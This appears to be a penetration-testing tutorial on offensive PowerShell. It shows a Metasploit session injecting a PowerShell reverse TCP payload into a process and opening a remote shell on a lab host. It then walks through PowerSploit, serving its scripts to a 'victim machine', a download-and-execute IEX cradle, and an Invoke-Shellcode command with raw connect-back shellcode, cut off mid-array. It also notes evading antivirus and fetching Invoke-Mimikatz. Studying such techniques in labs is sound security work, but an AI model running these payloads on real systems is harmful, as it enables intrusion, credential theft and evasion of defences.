PowerShell is so powerful
What is PowerShell?
PowerShell is an automation platform and scripting language for Windows and Windows Server that allows you to simplify the management of your systems. Unlike other text-based shells, PowerShell harnesses the power of the .NET Framework, providing rich objects and a massive set of built-in functionality for taking control of your Windows environments.
msf post(exec_powershell) > use post/windows/manage/payload_inject
msf post(payload_inject) > set PAYLOAD windows/powershell_reverse_tcp
PAYLOAD => windows/powershell_reverse_tcp
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 1 no Select the amount of shells you want to spawn.
HANDLER false no Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/powershell_reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION yes The session to run this module on.
msf post(payload_inject) > set LHOST 192.168.0.114
LHOST => 192.168.0.114
msf post(payload_inject) > set SESSION 1
SESSION => 1
msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > run
[*] Running module against LAB
[*] Starting exploit/multi/handler
[*] Performing Architecture Check
[*] Started reverse SSL handler on 192.168.0.114:4433
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Interactive Powershell Session, Reverse TCP into process ID 352
[*] Opening process 352
[*] Starting the payload handler...
[*] Generating payload
[*] Allocating memory in procees 352
[*] Allocated memory at address 0x00120000, for 1723 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 352
[*] Post module execution completed
msf post(payload_inject) > [*] Powershell session session 2 opened (192.168.0.114:4433 -> 192.168.0.108:5460) at 2016-10-15 03:24:22 -0500
msf post(payload_inject) > sess 2
[*] Starting interaction with 2...
Windows PowerShell running as user test on LAB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\test>Get-Command -Name get-*
CommandType Name ModuleName
----------- ---- ----------
Function Get-DscConfiguration PSDesiredStateConfiguration
Function Get-DscLocalConfigurationManager PSDesiredStateConfiguration
Function Get-DscResource PSDesiredStateConfiguration
Function Get-FileHash Microsoft.PowerShell.Utility
Function Get-IseSnippet ISE
Function Get-LogProperties PSDiagnostics
Function Get-Verb
Function Get-Webclient
Cmdlet Get-Acl Microsoft.PowerShell.Security
Cmdlet Get-Alias Microsoft.PowerShell.Utility
Cmdlet Get-AppLockerFileInformation AppLocker
Cmdlet Get-AppLockerPolicy AppLocker
Cmdlet Get-AuthenticodeSignature Microsoft.PowerShell.Security
Cmdlet Get-BitsTransfer BitsTransfer
Cmdlet Get-ChildItem Microsoft.PowerShell.Management
Cmdlet Get-ChildPrimitive TShell
Cmdlet Get-CimAssociatedInstance CimCmdlets
Cmdlet Get-CimClass CimCmdlets
Cmdlet Get-CimInstance CimCmdlets
Cmdlet Get-CimSession CimCmdlets
Cmdlet Get-Command Microsoft.PowerShell.Core
Cmdlet Get-ComputerRestorePoint Microsoft.PowerShell.Management
Cmdlet Get-Content Microsoft.PowerShell.Management
Cmdlet Get-ControlPanelItem Microsoft.PowerShell.Management
Cmdlet Get-Counter Microsoft.PowerShell.Diagnostics
Cmdlet Get-Credential Microsoft.PowerShell.Security
Cmdlet Get-Culture Microsoft.PowerShell.Utility
Cmdlet Get-Date Microsoft.PowerShell.Utility
Cmdlet Get-Device TShell
Cmdlet Get-Event Microsoft.PowerShell.Utility
Cmdlet Get-EventLog Microsoft.PowerShell.Management
Cmdlet Get-EventSubscriber Microsoft.PowerShell.Utility
Cmdlet Get-ExecutionPolicy Microsoft.PowerShell.Security
Cmdlet Get-FormatData Microsoft.PowerShell.Utility
Cmdlet Get-Help Microsoft.PowerShell.Core
Cmdlet Get-History Microsoft.PowerShell.Core
Cmdlet Get-Host Microsoft.PowerShell.Utility
Cmdlet Get-HotFix Microsoft.PowerShell.Management
Cmdlet Get-Item Microsoft.PowerShell.Management
Cmdlet Get-ItemProperty Microsoft.PowerShell.Management
Cmdlet Get-Job Microsoft.PowerShell.Core
Cmdlet Get-JobTrigger PSScheduledJob
Cmdlet Get-Location Microsoft.PowerShell.Management
Cmdlet Get-Member Microsoft.PowerShell.Utility
Cmdlet Get-Module Microsoft.PowerShell.Core
Cmdlet Get-PfxCertificate Microsoft.PowerShell.Security
Cmdlet Get-Process Microsoft.PowerShell.Management
Cmdlet Get-PSBreakpoint Microsoft.PowerShell.Utility
Cmdlet Get-PSCallStack Microsoft.PowerShell.Utility
Cmdlet Get-PSDrive Microsoft.PowerShell.Management
Cmdlet Get-PSProvider Microsoft.PowerShell.Management
Cmdlet Get-PSSession Microsoft.PowerShell.Core
Cmdlet Get-PSSessionConfiguration Microsoft.PowerShell.Core
Cmdlet Get-PSSnapin Microsoft.PowerShell.Core
Cmdlet Get-Random Microsoft.PowerShell.Utility
Cmdlet Get-ResultSummary TShell
Cmdlet Get-ScheduledJob PSScheduledJob
Cmdlet Get-ScheduledJobOption PSScheduledJob
Cmdlet Get-Service Microsoft.PowerShell.Management
Cmdlet Get-SuiteName TShell
Cmdlet Get-TaskOutputPath TShell
Cmdlet Get-TraceSource Microsoft.PowerShell.Utility
Cmdlet Get-Transaction Microsoft.PowerShell.Management
Cmdlet Get-TroubleshootingPack TroubleshootingPack
Cmdlet Get-TypeData Microsoft.PowerShell.Utility
Cmdlet Get-UICulture Microsoft.PowerShell.Utility
Cmdlet Get-Unique Microsoft.PowerShell.Utility
Cmdlet Get-Variable Microsoft.PowerShell.Utility
Cmdlet Get-WinEvent Microsoft.PowerShell.Diagnostics
Cmdlet Get-WmiObject Microsoft.PowerShell.Management
Cmdlet Get-WSManCredSSP Microsoft.WSMan.Management
Cmdlet Get-WSManInstance Microsoft.WSMan.Management
PS C:\Users\test>
PowerSploit
PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test.
If you have GIT, then you can simply run the following command to get all files from the github repository:
┌─[]─[/opt]
└──╼ sudo git clone https://github.com/PowerShellMafia/PowerSploit
[sudo] password for lab:
Cloning into 'PowerSploit'...
remote: Counting objects: 1586, done.
remote: Total 1586 (delta 0), reused 0 (delta 0), pack-reused 1586
Receiving objects: 100% (1586/1586), 5.89 MiB | 43.00 KiB/s, done.
Resolving deltas: 100% (789/789), done.
Checking connectivity... done.
To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions.
Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it.
For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python:
┌─[(master)]─[/opt/PowerSploit]
└──╼ python2 -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.1.103 - - [08/Nov/2015 13:53:23] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 13:53:23] code 404, message File not found
192.168.1.103 - - [08/Nov/2015 13:53:23] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.103 - - [08/Nov/2015 13:55:04] "GET /CodeExecution/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 13:55:19] "GET /CodeExecution/Invoke--Shellcode.ps1 HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:00:23] "GET /CodeExecution/Usage.md HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:01:26] "GET /Recon/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:01:34] "GET /Persistence/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:01:43] "GET /Recon/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:02:11] "GET /Recon/Invoke-Portscan.ps1 HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:05:47] "GET /Exfiltration/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:07:45] "GET /Exfiltration/Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
PowerSploit has categorized all the scripts in a pretty clear and organized manner:
Name | Description |
---|---|
Antivirus Bypass | Find bytes of a file which has a matching signature in antivirus. |
Code Execution | Used to execute code on victim machine. |
Exfiltration | Manipulate and collect information & data from victim machine(s). |
Persistence | Maintain control to machine by adding persistence to scripts. |
PE Tools | Handy PowerShell cmdlets for enumeration. |
Recon | Perform reconnaissance tasks using victim machine. |
Reverse Engineering | Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal. |
Script Modification | Create and manipulate scripts on victim machine. |
In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration).
Install and run a PowerShell script
IEX (New-Object Net.WebClient).DownloadString("http://<ip_address>/full_path/script_name.ps1")
This command when run in PowerShell will install that PowerShell for the current process of PowerShell only.
Invoke-Shellcode
This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk.
We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using:
powershell.exe -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force -ShellCode @(0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x72,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0